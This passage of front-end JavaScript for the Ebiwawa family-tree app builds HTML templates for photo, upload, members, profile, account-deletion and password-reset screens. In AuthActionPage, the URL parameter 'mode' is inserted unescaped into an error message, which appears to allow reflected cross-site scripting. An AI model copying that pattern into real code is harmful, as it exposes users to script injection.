                    <button onclick="navigatePhoto(1)" aria-label="Next photo" class="ebw-lightbox-navbtn absolute right-4 top-1/2 transform -translate-y-1/2 bg-black bg-opacity-50 text-white p-4 rounded-full hover:bg-opacity-75 transition-all z-50">
                        ${tablerIcon('chevron-right', { size: 24, preserveColor: true })}
                    </button>

                    <!-- Photo Container. Padding is desktop-scale by default;
                         F19 max-height: 500px query collapses it to 0.5rem so
                         landscape phone gets max image space. -->
                    <div class="ebw-lightbox-photo-container max-w-6xl max-h-screen px-2 py-16 sm:px-16 sm:py-20 flex flex-col items-center justify-center">
                        <div id="lightbox-photo-region" class="relative">
                            <img id="lightbox-image" src="" alt="" class="max-w-full object-contain rounded-lg shadow-2xl">
                            <!-- Photo tags overlay -->
                            <div id="photo-tags-overlay" class="absolute inset-0 pointer-events-none"></div>
                        </div>
                        <div id="lightbox-caption" class="ebw-lightbox-caption mt-4 text-white text-center max-w-2xl"></div>
                        <div id="lightbox-counter" class="mt-2 text-gray-400 text-sm"></div>
                        <!-- Tagged people list -->
                        <div id="tagged-people-list" class="mt-3 text-white text-sm"></div>
                    </div>

                    <!-- AI Photo Analysis Result (fixed bottom panel).
                         Explicit left-4/right-4 insets + mx-auto + max-w-xl
                         (not left-1/2 -translate-x-1/2 w-full mx-4 which
                         overflowed at 390px). Scroll region lives on INNER
                         card in aiDescribePhoto — see 07-17 Edit Profile fix.
                         safe-area-bottom keeps content clear of iOS home
                         indicator. -->
                    <div id="ai-photo-result" class="hidden absolute bottom-4 left-4 right-4 mx-auto max-w-xl z-50 safe-area-bottom"></div>

                    <!-- Tag People Interface (hidden by default) -->
                    <div id="tag-people-interface" class="hidden absolute bottom-4 left-4 right-4 mx-auto max-w-md bg-white rounded-lg shadow-xl p-4 z-50 safe-area-bottom">
                        <h3 class="font-semibold mb-3 text-gray-900">Select a person to tag:</h3>
                        <div id="tag-people-selector" class="max-h-64 overflow-y-auto space-y-2">
                            <!-- Family members will be loaded here -->
                        </div>
                        <button onclick="togglePhotoTagging()" class="mt-3 w-full px-4 py-2 bg-gray-200 hover:bg-gray-300 rounded-md text-gray-800 min-h-[44px]">
                            Cancel
                        </button>
                    </div>
                </div>
            `;
        }

        function ShareDocumentModal() {
            return `
                <div id="share-document-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-2xl p-8 space-y-6 rounded-lg shadow-xl bg-white transform translate-y-10 transition-transform duration-300">
                        <div class="flex items-center justify-between">
                            <h2 class="text-2xl font-bold">Share Document</h2>
                            <button onclick="closeModal('share-document-modal')" class="text-gray-400 hover:text-gray-600">
                                ${tablerIcon('x', { size: 24, preserveColor: true })}
                            </button>
                        </div>

                        <div id="share-document-content">
                            <!-- Content loaded dynamically -->
                        </div>

                        <div id="share-document-error" class="text-sm text-center text-error"></div>
                    </div>
                </div>
            `;
        }

        function UploadPhotoModal() {
            // Title + caption label + submit button copy are updated at
            // runtime by handleAlbumUpload / handlePhotoUploadSubmit based
            // on how many files are pending. Single-file: "Upload Photo".
            // Multi-file: "Upload Photos (N)" + label clarifies caption
            // applies to all. Per-photo captions are Phase 2 per prompt.
            return `
                <div id="upload-photo-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-md p-6 space-y-4 rounded-lg shadow-xl bg-white transform translate-y-10 transition-transform duration-300">
                        <div class="flex items-center justify-between">
                            <h2 id="upload-photo-title" class="text-xl font-bold">Upload Photo</h2>
                            <button onclick="closeModal('upload-photo-modal')" class="text-gray-400 hover:text-gray-600">
                                ${tablerIcon('x', { size: 24, preserveColor: true })}
                            </button>
                        </div>

                        <div id="upload-photo-preview" class="mb-4">
                            <!-- Preview grid (multi) or single preview populated by _renderUploadModalPreviews -->
                        </div>

                        <form id="upload-photo-form" onsubmit="handlePhotoUploadSubmit(event); return false;" class="space-y-4">
                            <div>
                                <label id="photo-caption-label" for="photo-caption-input" class="block text-sm font-medium text-gray-700 mb-1">Caption (Optional)</label>
                                <textarea id="photo-caption-input" rows="3" placeholder="Add a description for this photo..." class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary"></textarea>
                            </div>

                            <div id="upload-photo-error" class="text-sm text-center text-error space-y-1"></div>

                            <div class="flex justify-end gap-3">
                                <button type="button" onclick="closeModal('upload-photo-modal')" class="px-4 py-2 font-semibold text-gray-700 bg-gray-200 rounded-md hover:bg-gray-300">
                                    Cancel
                                </button>
                                <button type="submit" id="upload-photo-submit-btn" class="btn btn-primary">
                                    Upload
                                </button>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        function AIToolsModal() {
            return `
                <div id="ai-tools-modal" class="modal-overlay fixed inset-0 z-50 flex items-start justify-center bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto">
                    <div id="ai-tools-modal-content" class="w-full max-w-2xl mx-4 my-8 p-6 space-y-6 rounded-lg shadow-xl bg-white transform translate-y-10 transition-transform duration-300 mb-20">
                        <div class="flex items-center justify-between">
                            <h2 class="text-xl font-bold flex items-center gap-2">
                                ${tablerIcon('wand', { size: 24, className: 'text-purple-600', preserveColor: true })}
                                AI Tools
                            </h2>
                            <button onclick="closeModal('ai-tools-modal')" class="text-gray-400 hover:text-gray-600">
                                ${tablerIcon('x', { size: 24, preserveColor: true })}
                            </button>
                        </div>

                        ${FEATURES.documentOCR ? `
                        <!-- OCR / Document Analysis Section -->
                        <div class="border border-gray-200 rounded-lg p-4">
                            <h3 class="font-semibold text-gray-800 mb-2 flex items-center gap-2">
                                ${tablerIcon('file-text', { size: 20, preserveColor: true })}
                                Document OCR & Analysis
                            </h3>
                            <p class="text-sm text-gray-600 mb-3">Extract text from old letters, certificates, newspaper clippings, and handwritten notes.</p>
                            <!-- Results appear here first -->
                            <div id="ocr-result" class="hidden mb-3"></div>
                            <div class="space-y-3">
                                <input type="file" id="ocr-file-input" accept="image/*,.pdf" class="w-full text-sm border border-gray-300 rounded-md p-2">
                                <button type="button" id="ocr-analyze-btn" onclick="analyzeDocument()" class="w-full px-4 py-2 bg-purple-600 hover:bg-purple-700 text-white font-semibold rounded-md transition-colors">
                                    Analyze Document
                                </button>
                            </div>
                        </div>
                        ` : ''}

                        ${FEATURES.audioTranscription ? `
                        <!-- Audio Transcription Section -->
                        <div class="border border-gray-200 rounded-lg p-4">
                            <h3 class="font-semibold text-gray-800 mb-2 flex items-center gap-2">
                                ${tablerIcon('microphone', { size: 20, preserveColor: true })}
                                Audio Transcription
                            </h3>
                            <p class="text-sm text-gray-600 mb-3">Transcribe oral histories, family interviews, and voice recordings to preserve stories in text.</p>
                            <!-- Results appear here first -->
                            <div id="audio-result" class="hidden mb-3"></div>
                            <div class="space-y-3">
                                <input type="file" id="audio-file-input" accept="audio/*,.mp3,.wav,.m4a,.ogg,.webm,.flac" class="w-full text-sm border border-gray-300 rounded-md p-2">
                                <button type="button" id="audio-transcribe-btn" onclick="transcribeAudio()" class="w-full px-4 py-2 bg-purple-600 hover:bg-purple-700 text-white font-semibold rounded-md transition-colors">
                                    Transcribe Audio
                                </button>
                            </div>
                        </div>
                        ` : ''}

                        <div class="text-xs text-gray-400 text-center pt-2 border-t">
                            Powered by Gemini AI via Vertex AI
                        </div>
                    </div>
                </div>
            `;
        }

        // Session 2c.1 #5: Add tab action sheet. Bottom sheet with three
        // options — Take Photo / Choose from Library / Write a Post — so the
        // center Add button in the tab bar can start a text post from any
        // view. Modal-overlay + custom bottom-sheet card style. Backdrop
        // tap closes.
        function AddActionSheetModal() {
            return `
                <div id="add-action-sheet-modal" onclick="if(event.target===event.currentTarget)closeModal('add-action-sheet-modal')" class="modal-overlay fixed inset-0 z-50 flex items-end justify-center bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none">
                    <div class="w-full max-w-md mx-auto rounded-t-2xl shadow-xl bg-surface transform translate-y-10 transition-transform duration-300 safe-area-bottom">
                        <div class="flex justify-center pt-2 pb-1">
                            <div class="w-10 h-1 rounded-full bg-gray-300"></div>
                        </div>
                        <div class="px-4 pt-2 pb-4 space-y-2">
                            <button type="button" onclick="ebwAddSheetTakePhoto()" class="w-full flex items-center gap-3 min-h-[56px] px-4 py-3 rounded-lg hover:bg-gray-100 active:bg-gray-200 transition-colors text-left">
                                ${tablerIcon('camera', { size: 24 })}
                                <span class="text-base font-medium text-gray-800">Take Photo</span>
                            </button>
                            <button type="button" onclick="ebwAddSheetChooseFromLibrary()" class="w-full flex items-center gap-3 min-h-[56px] px-4 py-3 rounded-lg hover:bg-gray-100 active:bg-gray-200 transition-colors text-left">
                                ${tablerIcon('photo', { size: 24 })}
                                <span class="text-base font-medium text-gray-800">Choose from Library</span>
                            </button>
                            <button type="button" onclick="ebwAddSheetWritePost()" class="w-full flex items-center gap-3 min-h-[56px] px-4 py-3 rounded-lg hover:bg-gray-100 active:bg-gray-200 transition-colors text-left">
                                ${tablerIcon('pencil', { size: 24 })}
                                <span class="text-base font-medium text-gray-800">Write a Post</span>
                            </button>
                            <button type="button" onclick="closeModal('add-action-sheet-modal')" class="w-full flex items-center justify-center min-h-[48px] px-4 py-3 mt-1 rounded-lg text-sm font-semibold text-gray-600 hover:bg-gray-100 active:bg-gray-200 transition-colors">
                                Cancel
                            </button>
                        </div>
                    </div>
                </div>
            `;
        }

        function MembersPage() {
            return `
                <div id="members-view" data-view>
                    <!-- Header -->
                    <div class="flex items-center justify-between mb-6">
                        <div>
                            <h2 class="text-2xl font-semibold">Family & Connections</h2>
                            <p class="text-sm text-gray-600 mt-1">Find family, manage connections, and collaborate</p>
                        </div>
                    </div>

                    <!-- Tab Navigation -->
                    <div class="bg-white rounded-t-lg shadow-md border border-gray-200 border-b-0">
                        <div class="flex border-b border-gray-200 overflow-x-auto">
                            <button
                                onclick="switchConnectionTab('find-family')"
                                id="tab-find-family"
                                class="flex-1 min-w-0 whitespace-nowrap px-2 sm:px-6 py-3 sm:py-4 text-xs sm:text-sm font-medium text-gray-600 hover:text-primary hover:bg-gray-50 border-b-2 border-transparent transition-colors inline-flex items-center justify-center gap-2"
                            >
                                ${tablerIcon('search', { size: 16 })} Find Family
                            </button>
                            <button
                                onclick="switchConnectionTab('requests')"
                                id="tab-requests"
                                class="flex-1 min-w-0 whitespace-nowrap px-2 sm:px-6 py-3 sm:py-4 text-xs sm:text-sm font-medium text-gray-600 hover:text-primary hover:bg-gray-50 border-b-2 border-transparent transition-colors relative inline-flex items-center justify-center gap-2"
                            >
                                ${tablerIcon('inbox', { size: 16 })} Requests
                                <span id="requests-badge" class="hidden absolute top-2 right-2 bg-red-500 text-white text-xs font-bold rounded-full h-5 w-5 flex items-center justify-center">0</span>
                            </button>
                            <button
                                onclick="switchConnectionTab('members')"
                                id="tab-members"
                                class="flex-1 min-w-0 whitespace-nowrap px-2 sm:px-6 py-3 sm:py-4 text-xs sm:text-sm font-medium text-primary bg-gray-50 border-b-2 border-primary transition-colors inline-flex items-center justify-center gap-2"
                            >
                                ${tablerIcon('users', { size: 16 })} Members
                            </button>
                            <button
                                onclick="switchConnectionTab('invitations')"
                                id="tab-invitations"
                                class="flex-1 min-w-0 whitespace-nowrap px-2 sm:px-6 py-3 sm:py-4 text-xs sm:text-sm font-medium text-gray-600 hover:text-primary hover:bg-gray-50 border-b-2 border-transparent transition-colors inline-flex items-center justify-center gap-2"
                            >
                                ${tablerIcon('mail', { size: 16 })} Invitations
                            </button>
                        </div>
                    </div>

                    <!-- Tab Content Container -->
                    <div class="bg-white rounded-b-lg shadow-md border border-gray-200">

                        <!-- Find Family Tab -->
                        <div id="tab-content-find-family" class="tab-content hidden p-4 sm:p-6">
                            <div class="max-w-2xl mx-auto">
                                <h3 class="text-lg font-semibold text-gray-800 mb-4">Find Family Members</h3>
                                <p class="text-sm text-gray-600 mb-6">Search for family members already on Ebiwawa and send them a connection request.</p>

                                <!-- Search Box -->
                                <div class="mb-6">
                                    <div class="relative">
                                        <svg class="absolute left-3 top-1/2 -translate-y-1/2 w-5 h-5 text-gray-400 pointer-events-none" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0z"></path>
                                        </svg>
                                        <input
                                            type="text"
                                            id="family-search-input"
                                            placeholder="Search by name or email..."
                                            class="w-full py-3 pr-4 border border-gray-300 rounded-lg focus:outline-none focus:ring-2 focus:ring-primary"
                                            style="padding-left: 4rem;"
                                            oninput="handleFamilySearch()"
                                        >
                                    </div>
                                </div>

                                <!-- Search Results -->
                                <div id="family-search-results" class="space-y-3">
                                    <p class="text-center text-gray-500 text-sm py-8">Start typing to search for family members</p>
                                </div>
                            </div>
                        </div>

                        <!-- Requests Tab -->
                        <div id="tab-content-requests" class="tab-content hidden p-4 sm:p-6">
                            <div class="max-w-4xl mx-auto">
                                <!-- Sub-tabs for Received/Sent -->
                                <div class="flex gap-2 mb-6 border-b border-gray-200">
                                    <button
                                        onclick="switchRequestsSubTab('received')"
                                        id="subtab-received"
                                        class="px-4 py-2 text-sm font-medium text-primary border-b-2 border-primary"
                                    >
                                        Received
                                    </button>
                                    <button
                                        onclick="switchRequestsSubTab('sent')"
                                        id="subtab-sent"
                                        class="px-4 py-2 text-sm font-medium text-gray-600 border-b-2 border-transparent hover:text-gray-800"
                                    >
                                        Sent
                                    </button>
                                </div>

                                <!-- Received Requests -->
                                <div id="received-requests-content" class="space-y-3">
                                    <p class="text-center text-gray-500 py-8">Loading requests...</p>
                                </div>

                                <!-- Sent Requests -->
                                <div id="sent-requests-content" class="hidden space-y-3">
                                    <p class="text-center text-gray-500 py-8">Loading requests...</p>
                                </div>
                            </div>
                        </div>

                        <!-- Members Tab -->
                        <div id="tab-content-members" class="tab-content p-4 sm:p-6">
                            <div class="flex flex-col sm:flex-row sm:items-center sm:justify-between mb-6 gap-3">
                                <div class="min-w-0">
                                    <h3 class="text-lg font-semibold text-gray-800">Active Members</h3>
                                    <p class="text-sm text-gray-600 mt-1">People who have access to your family tree</p>
                                </div>
                                <button onclick="openModal('invite-family-modal')" class="btn btn-primary flex-shrink-0 w-full sm:w-auto">
                                    + Invite Member
                                </button>
                            </div>

                            <!-- Stats Cards -->
                            <div class="grid grid-cols-1 md:grid-cols-3 gap-4 mb-6">
                                <div class="bg-white rounded-lg shadow-sm p-4 border border-gray-200">
                                    <div class="flex items-center">
                                        <div class="p-3 bg-blue-100 rounded-lg">
                                            ${tablerIcon('users', { size: 24, preserveColor: true })}
                                        </div>
                                        <div class="ml-4">
                                            <p class="text-sm font-medium text-gray-600">Active Members</p>
                                            <p id="active-members-count" class="text-2xl font-bold text-gray-900">-</p>
                                        </div>
                                    </div>
                                </div>

                                <div class="bg-white rounded-lg shadow-sm p-4 border border-gray-200">
                                    <div class="flex items-center">
                                        <div class="p-3 bg-yellow-100 rounded-lg">
                                            ${tablerIcon('clock', { size: 24, preserveColor: true })}
                                        </div>
                                        <div class="ml-4">
                                            <p class="text-sm font-medium text-gray-600">Pending Invites</p>
                                            <p id="pending-invites-count" class="text-2xl font-bold text-gray-900">-</p>
                                        </div>
                                    </div>
                                </div>

                                <div class="bg-white rounded-lg shadow-sm p-4 border border-gray-200">
                                    <div class="flex items-center">
                                        <div class="p-3 bg-green-100 rounded-lg">
                                            ${tablerIcon('shield-check', { size: 24, preserveColor: true })}
                                        </div>
                                        <div class="ml-4">
                                            <p class="text-sm font-medium text-gray-600">Admins</p>
                                            <p id="admin-count" class="text-2xl font-bold text-gray-900">-</p>
                                        </div>
                                    </div>
                                </div>
                            </div>

                            <!-- Active Members: table for md+, stacked cards for mobile.
                                 Both populate from the same fetch — see the render
                                 function that writes to #members-table-body and
                                 #members-cards-mobile. Table wrapper hidden below md;
                                 cards container hidden md+. -->
                            <div class="hidden md:block bg-white rounded-lg border border-gray-200">
                                <div class="overflow-x-auto">
                                    <table class="w-full">
                                        <thead class="bg-gray-50 border-b border-gray-200">
                                            <tr>
                                                <th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Member</th>
                                                <th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Role</th>
                                                <th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Joined</th>
                                                <th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Actions</th>
                                            </tr>
                                        </thead>
                                        <tbody id="members-table-body" class="bg-white divide-y divide-gray-200">
                                            <tr>
                                                <td colspan="4" class="px-6 py-4 text-center text-gray-500">Loading members...</td>
                                            </tr>
                                        </tbody>
                                    </table>
                                </div>
                            </div>
                            <div id="members-cards-mobile" class="md:hidden space-y-3">
                                <p class="text-center text-gray-500 py-4">Loading members...</p>
                            </div>
                        </div>

                        <!-- Invitations Tab -->
                        <div id="tab-content-invitations" class="tab-content hidden p-4 sm:p-6">
                            <div class="mb-6">
                                <div class="flex flex-col sm:flex-row sm:items-center sm:justify-between gap-3">
                                    <div class="min-w-0">
                                        <h3 class="text-lg font-semibold text-gray-800">Pending Invitations</h3>
                                        <p class="text-sm text-gray-600 mt-1">Email invitations that haven't been accepted yet</p>
                                    </div>
                                    <button onclick="openModal('invite-family-modal')" class="btn btn-primary flex-shrink-0 w-full sm:w-auto">
                                        + Send Invitation
                                    </button>
                                </div>
                            </div>

                            <!-- Pending Invitations: table for md+, stacked cards for mobile. -->
                            <div class="hidden md:block bg-white rounded-lg border border-gray-200">
                                <div class="overflow-x-auto">
                                    <table class="w-full">
                                        <thead class="bg-gray-50 border-b border-gray-200">
                                            <tr>
                                                <th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Email</th>
                                                <th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Relationship</th>
                                                <th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Invited</th>
                                                <th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Status</th>
                                                <th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Actions</th>
                                            </tr>
                                        </thead>
                                        <tbody id="invites-table-body" class="bg-white divide-y divide-gray-200">
                                            <tr>
                                                <td colspan="5" class="px-6 py-4 text-center text-gray-500">Loading invitations...</td>
                                            </tr>
                                        </tbody>
                                    </table>
                                </div>
                            </div>
                            <div id="invites-cards-mobile" class="md:hidden space-y-3">
                                <p class="text-center text-gray-500 py-4">Loading invitations...</p>
                            </div>
                        </div>

                        <!-- Blocked Users Section -->
                        <div class="bg-white rounded-lg shadow-md border border-gray-200">
                            <div class="p-6">
                                <h3 class="text-lg font-semibold text-gray-800 mb-4">Blocked Users</h3>
                                <div class="overflow-x-auto">
                                    <table class="min-w-full divide-y divide-gray-200">
                                        <thead class="bg-gray-50">
                                            <tr>
                                                <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Name</th>
                                                <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Email</th>
                                                <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Blocked Date</th>
                                                <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Actions</th>
                                            </tr>
                                        </thead>
                                        <tbody id="blocked-users-table-body" class="bg-white divide-y divide-gray-200">
                                            <tr>
                                                <td colspan="4" class="px-6 py-4 text-center text-gray-500">Loading blocked users...</td>
                                            </tr>
                                        </tbody>
                                    </table>
                                </div>
                            </div>
                        </div>

                    </div>
                </div>
            `;
        }

        function ProfilePage() {
            return `
                <div id="profile-view" data-view>
                    <!-- Header -->
                    <div class="flex items-center justify-between mb-6">
                        <h2 class="text-2xl font-semibold">My Profile</h2>
                        <button onclick="openEditProfileModal()" class="btn btn-primary">
                            Edit Profile
                        </button>
                    </div>

                    <!-- Session 2c Task 1: native-only chrome for demoted hamburger items.
                         On native, the tab bar has 5 slots and sidebar is hidden. Calendar
                         / AI Tools / Help / Logout / Documents (if enabled) surface here.
                         Web (desktop + mobile web) skips this block — sidebar / hamburger
                         handle those destinations. Hidden by default; body.ebw-native
                         reveals it via display:block below. -->
                    <div class="ebw-native-only-block bg-white rounded-lg shadow-md border border-gray-200 mb-6" style="display:none;">
                        <ul class="divide-y divide-gray-100">
                            <!-- Calendar removed from native Profile chrome 2026-09-15. Now
                                 surfaced as an in-Feed card that shows upcoming family birthdays
                                 + memorial anniversaries. Users still reach the full Calendar via
                                 tapping that card. -->
                            ${FEATURES.documents ? `
                            <li>
                                <a href="#" onclick="navigateToView('documents-view'); return false;" class="flex items-center gap-3 px-5 py-4 min-h-[48px] hover:bg-gray-50 active:bg-gray-100">
                                    ${tablerIcon('file-text', { size: 20 })}
                                    <span>Documents</span>
                                </a>
                            </li>` : ''}
                            <!-- AI Tools removed from native Profile chrome 2026-09-15.
                                 Per LAUNCH-SCOPE the only shipping AI feature is Photo Analysis
                                 (era estimation), which lives inline in the photo lightbox
                                 toolbar. The AIToolsModal is vestigial UI referencing deferred
                                 features (Story Generator, Audio Transcription, Document OCR).
                                 Desktop sidebar link kept for now — separate cleanup track. -->
                            <li>
                                <a href="#" onclick="openHelpDrawer(); return false;" class="flex items-center gap-3 px-5 py-4 min-h-[48px] hover:bg-gray-50 active:bg-gray-100">
                                    ${tablerIcon('info-circle', { size: 20 })}
                                    <span>Help &amp; Glossary</span>
                                </a>
                            </li>
                            <li>
                                <a href="#" onclick="logout(); return false;" class="flex items-center gap-3 px-5 py-4 min-h-[48px] text-red-600 hover:bg-red-50 active:bg-red-100">
                                    ${tablerIcon('door-exit', { size: 20 })}
                                    <span>Log out</span>
                                </a>
                            </li>
                        </ul>
                    </div>

                    <!-- Profile Content -->
                    <div class="bg-white rounded-lg shadow-md border border-gray-200">
                        <!-- Loading State -->
                        <div id="profile-loading" class="p-8 text-center">
                            <p class="text-gray-500">Loading profile...</p>
                        </div>

                        <!-- Profile Display -->
                        <div id="profile-content" class="hidden">
                            <!-- Will be populated by JavaScript -->
                        </div>
                    </div>

                    <!-- Phase 3: Manage Privacy (per-profile toggle). Renders
                         only when the user has claimed a Person (see
                         renderManagePrivacyRow). -->
                    <div id="manage-privacy-slot"></div>

                    <!-- Privacy & Data (GDPR) -->
                    <div class="bg-white rounded-lg shadow-md border border-gray-200 mt-6 p-6">
                        <h3 class="text-lg font-semibold mb-2">Privacy & Data</h3>
                        <p class="text-sm text-gray-600 mb-3">
                            You can download a copy of your data or delete your account at any time.
                        </p>
                        <!-- Quiet quick-access strip — sentence case, hint
                             styling, always visible (does not depend on
                             claimed-Person state). Privacy policy opens in
                             a new tab so the user doesn't lose their spot.
                             Delete my data scrolls to the Delete Account
                             row below — no duplicated copy, just a direct
                             affordance from this card's header. -->
                        <div class="mb-5 flex flex-wrap items-center gap-x-4 gap-y-1 text-xs text-gray-500">
                            <a href="/privacy" target="_blank" rel="noopener" class="hover:text-primary hover:underline whitespace-nowrap">Privacy policy ↗</a>
                            <span aria-hidden="true" class="text-gray-300">·</span>
                            <a href="#delete-account-row" onclick="event.preventDefault(); const el = document.getElementById('delete-account-row'); if (el) el.scrollIntoView({ behavior: 'smooth', block: 'center' });" class="hover:text-primary hover:underline whitespace-nowrap">Delete my data</a>
                        </div>

                        <div class="space-y-4">
                            <!-- Download row: stacked on mobile, side-by-side on sm+ -->
                            <div class="flex flex-col sm:flex-row sm:items-center sm:justify-between gap-3 p-4 border border-gray-200 rounded-lg">
                                <div class="flex-1">
                                    <div class="font-medium text-gray-900">Download my data</div>
                                    <div class="text-sm text-gray-500 mt-1">Get a JSON copy of your profile, posts, comments, messages, and connections.</div>
                                </div>
                                <button id="download-data-btn" onclick="downloadMyData()" class="btn btn-secondary whitespace-nowrap w-full sm:w-auto inline-flex items-center justify-center gap-2">
                                    ${tablerIcon('download', { size: 16 })} Download
                                </button>
                            </div>

                            <!-- Delete row: same layout, red treatment.
                                 id=delete-account-row is the scroll target
                                 for the "Delete my data" link inside the
                                 Manage Privacy card above. -->
                            <div id="delete-account-row" class="flex flex-col sm:flex-row sm:items-center sm:justify-between gap-3 p-4 border border-red-200 bg-red-50 rounded-lg">
                                <div class="flex-1">
                                    <div class="font-medium text-red-800">Delete my account</div>
                                    <div class="text-sm text-red-700 mt-1">
                                        Anonymizes your profile and signs you out. Posts and messages remain visible to others but appear as "Deleted User".
                                        <a href="/data-deletion" target="_blank" rel="noopener" class="underline hover:no-underline">Learn more about data deletion →</a>
                                    </div>
                                </div>
                                <button onclick="openDeleteAccountModal()" class="btn whitespace-nowrap w-full sm:w-auto inline-flex items-center justify-center gap-2" style="background:#dc2626;color:white;border:1px solid #b91c1c;">
                                    ${tablerIcon('trash', { size: 16 })} Delete Account
                                </button>
                            </div>
                        </div>
                    </div>

                    <!-- Delete Account Confirmation Modal -->
                    <div id="delete-account-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                        <div class="w-full max-w-md p-6 rounded-lg shadow-xl bg-white">
                            <h3 class="text-xl font-bold text-red-700 mb-2">Delete your account?</h3>
                            <p class="text-sm text-gray-700 mb-4">
                                This will anonymize your profile data and sign you out. You'll be unable to sign back in with this account.
                                Posts, comments, and messages you've created remain visible to other family members but will appear as "Deleted User".
                            </p>
                            <p class="text-sm text-gray-600 mb-2">
                                Type <strong>DELETE</strong> to confirm:
                            </p>
                            <input id="delete-confirm-input" type="text" autocomplete="off" placeholder="DELETE"
                                   oninput="updateDeleteConfirmState()"
                                   class="w-full mb-4" />
                            <div id="delete-error" class="text-sm text-red-600 mb-3 hidden"></div>
                            <div class="flex justify-end gap-2">
                                <button onclick="closeDeleteAccountModal()" class="btn btn-ghost">Cancel</button>
                                <button id="delete-confirm-btn" onclick="submitDeleteAccount()" disabled class="btn"
                                        style="background:#dc2626;color:white;">Delete account</button>
                            </div>
                        </div>
                    </div>
                </div>
            `;
        }

        // Branded handler for Firebase Auth action URLs (/auth/action?mode=...).
        // Today we only own mode=resetPassword — the rest fall through to a
        // generic "link can't be used" UI with a back-to-login affordance.
        // Firebase's default action page (under the reserved /__/auth/action
        // path) provides single-field UX and no real branding control, so we
        // intercept and render our own.
        function AuthActionPage({ mode, oobCode }) {
            const isReset = mode === 'resetPassword' && oobCode;
            const isVerify = mode === 'verifyEmail' && oobCode;
            const headerCopy = isReset
                ? { title: 'Set a new password', sub: 'Verifying your link…' }
                : isVerify
                ? { title: 'Verifying your email…', sub: 'One moment while we confirm your address.' }
                : { title: 'This link can\'t be used', sub: '' };
            return `
                <div class="auth-centered-layout">
                    <div class="auth-centered-content">
                        <div class="auth-form-container">
                            <div class="text-center mb-4">
                                <img src="/ebiwawa-logo.svg" alt="Ebiwawa" class="mx-auto mb-2 auth-logo" style="object-fit: contain;">
                            </div>
                            <h1 class="text-2xl font-semibold text-center mb-1">${headerCopy.title}</h1>
                            <p id="reset-email-hint" class="text-sm text-center text-gray-600 mb-6">${headerCopy.sub}</p>

                            ${isReset ? `
                        <form id="reset-password-form" class="space-y-4 hidden">
                            <div>
                                <label class="block text-sm font-medium text-gray-700 mb-1" for="reset-new-password">New password</label>
                                <input id="reset-new-password" type="password" required minlength="10" autocomplete="new-password" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                <p class="text-xs text-gray-500 mt-1">At least 10 characters. A mix of letters, numbers, and a symbol is best — passphrases work well.</p>
                            </div>
                            <div>
                                <label class="block text-sm font-medium text-gray-700 mb-1" for="reset-confirm-password">Confirm new password</label>
                                <input id="reset-confirm-password" type="password" required minlength="10" autocomplete="new-password" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                            </div>
                            <div id="reset-error" class="text-sm text-center form-error"></div>
                            <button type="submit" id="reset-submit-btn" class="btn btn-primary w-full">Set new password</button>
                        </form>
                        ` : ''}

                        ${isVerify ? `
                        <div id="verify-success" class="hidden">
                            <div class="rounded-md border border-green-300 bg-green-50 p-3 text-sm text-green-900">
                                <p class="font-semibold mb-1">Email verified</p>
                                <p class="text-xs">Thanks — your email address is confirmed.</p>
                            </div>
                            <p class="text-center text-sm mt-6">
                                <a href="/" class="text-primary font-medium hover:underline">Continue to Ebiwawa</a>
                            </p>
                        </div>
                        ` : ''}

                        <div id="reset-invalid" class="${(isReset || isVerify) ? 'hidden' : ''}">
                            <div class="rounded-md border border-yellow-300 bg-yellow-50 p-3 text-sm text-yellow-900">
                                <p class="font-semibold mb-1">Link can't be used</p>
                                <p class="text-xs" id="reset-invalid-reason">${isReset ? 'This password-reset link is invalid or has expired.' : isVerify ? 'This verification link is invalid or has expired.' : `We don't recognize this action ("${mode || 'unknown'}"). Return to login and try again.`}</p>
                            </div>
                            <p class="text-center text-sm mt-6">
                                <a href="/" class="text-primary font-medium hover:underline">Back to login</a>
                            </p>
                        </div>

                            <div id="reset-success" class="hidden">
                                <div class="rounded-md border border-green-300 bg-green-50 p-3 text-sm text-green-900">
                                    <p class="font-semibold mb-1">Password updated</p>
                                    <p class="text-xs">You can now sign in with your new password.</p>
                                </div>
                                <p class="text-center text-sm mt-6">
                                    <a href="/" class="text-primary font-medium hover:underline">Go to login</a>
                                </p>
                            </div>
                        </div>
                    </div>
                    <footer class="auth-page-footer">
